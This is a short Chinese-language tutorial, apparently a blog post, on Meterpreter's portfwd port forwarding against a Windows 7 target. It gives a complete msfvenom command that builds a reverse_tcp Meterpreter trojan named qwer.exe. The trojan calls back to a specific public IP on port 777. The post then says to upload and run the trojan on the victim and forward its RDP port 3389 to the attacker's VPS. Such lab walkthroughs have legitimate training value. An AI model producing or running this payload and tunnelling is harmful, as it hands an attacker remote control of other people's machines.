基于portfwd端口转发
0x01 操作步骤
portfwd是一款功能强大的端口转发工具,内置于meterpreter中,也可以自己编译,
源码地址:https://github.com/rssnsj/portfwd
靶机:win7
攻击机:47.242.59.61
公网msf
1、生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.242.59.61 lport=777 -f exe -o qwer.exe
打开msf,配置连接,进行监听(此处监听端口为777)
将木马qwer.exe上传给靶机win7后打开,成功回弹
0x01 端口转发
将win7的3389端口转发到公网vps端口即可连接。这里远程时是公网vps的ip和端口
Portfwd add-l[LPORT] -p[RPORT] -r[RHOST]
连接成功
评论